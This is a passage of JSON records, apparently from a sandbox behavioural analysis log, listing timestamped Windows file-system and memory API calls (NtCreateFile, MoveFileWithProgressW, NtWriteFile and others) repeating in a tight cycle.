"NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,137", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,137", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,137", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,137", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,137", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,137", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,137", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,147", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,147", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,147", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,147", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,147", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,147", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,147", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,147", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,147", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,147", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,147", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,157", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,157", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,157", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,157", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,157", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,157", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,157", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,157", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,157", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,157", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,157", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,167", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,167", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,167", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,167", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,167", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,167", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,167", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,167", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,167", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,167", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,167", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,177", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,177", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,177", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,177", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,177", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,177", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,177", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,177", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,177", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,177", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,187", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,187", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,187", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,187", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,187", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,187", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,187", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,187", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,187", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,187", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,187", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,197", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,197", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,197", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,197", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,197", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,197", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,197", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,197", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,197", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,197", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,197", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,207", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,207", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,207", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,207", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,207", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,207", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,207", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,207", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,207", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,207", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,217", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,217", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,217", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,217", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,217", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,217", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,217", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,217", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,217", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,217", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,217", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,227", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,227", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,227", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,227", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,227", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,227", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,227", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,227", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,227", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,227", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,237", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,237", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,237", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,237", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,237", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,237", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,237", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,237", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,237", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,237", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,237", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,247", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,247", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,247", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,247", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,247", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,247", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,247", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,247", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,247", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,247", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,247", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,257", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,257", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,257", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,257", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,257", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,257", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,257", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,257", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,257", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,257", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,257", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,257", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,267", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,267", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,267", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,267", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,267", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,267", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,267", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,267", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,267", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,277", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,277", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,277", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,277", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,277", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,277", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,277", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,277", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,287", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,287", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,287", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,287", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,287", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,297", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,297", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,297", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,297", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,297", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,297", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,297", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,297", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,297", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,297", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,297", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,317", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,317", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,317", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,317", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,317", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,317", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,317", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,317", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,327", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,327", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,327", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,327", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,327", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,327", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,327", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,327", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,327", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,337", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,337", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,337", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,337", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,337", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,337", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,337", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,337", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,337", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,337", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,347", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,347", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,347", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,347", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,347", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,347", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,347", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,347", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,347", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,347", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,347", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,347", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,357", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,357", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,357", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,357", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,357", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,357", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,357", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,357", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,357", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,367", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,367", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,367", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,367", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,367", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,367", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,367", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,367", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,367", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,367", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,367", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,377", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,377", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,377", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,377", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,377", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,377", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,377", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,377", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,377", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,377", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,387", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,387", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,387", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,387", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,387", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,387", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,387", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,387", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,387", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,387", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,397", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,397", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,397", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,397", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,397", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,397", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,397", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,397", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,397", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,407", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,407", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,407", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,407", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,407", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,407", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,407", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,407", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,407", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,407", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,407", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,417", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,417", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,417", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,417", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,417", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,417", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,417", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,417", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,417", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,417", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,427", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,427", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,427", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,427", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,427", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,427", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,427", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,427", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,427", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,427", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,427", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,437", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,437", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,437", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,458", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,458", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,458", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,458", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,458", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,458", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,458", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,458", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,458", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,458", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,468", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,468", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,468", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,468", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,468", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,468", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,468", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,468", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,468", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,468", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,468", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,478", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,478", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,478", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,478", "api": 